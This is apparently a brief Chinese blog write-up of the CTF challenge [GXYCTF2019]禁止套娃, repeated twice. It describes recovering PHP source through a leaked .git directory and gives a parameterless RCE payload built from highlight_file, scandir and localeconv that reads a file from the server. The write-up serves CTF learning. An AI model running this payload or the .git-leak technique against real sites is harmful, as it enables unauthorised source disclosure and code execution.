1.发现
1.1基本操作无果,使用Git Hack扫描后台得到PHP代码。
2.步骤
2.1进行代码审计,根据代码,绕过限制,写出payload,得到flag。
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
3.借鉴
(36条消息) [GXYCTF2019]禁止套娃(.git泄露,无参RCE)_xlcvv的博客-CSDN博客
4.知识点
.git源码泄露
无参RCE
2023-12-23 08:24:57
1.1基本操作无果,使用Git Hack扫描后台得到PHP代码。
2.1进行代码审计,根据代码,绕过限制,写出payload,得到flag。
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
(36条消息) [GXYCTF2019]禁止套娃(.git泄露,无参RCE)_xlcvv的博客-CSDN博客
.git源码泄露
无参RCE
下一篇:Netty详解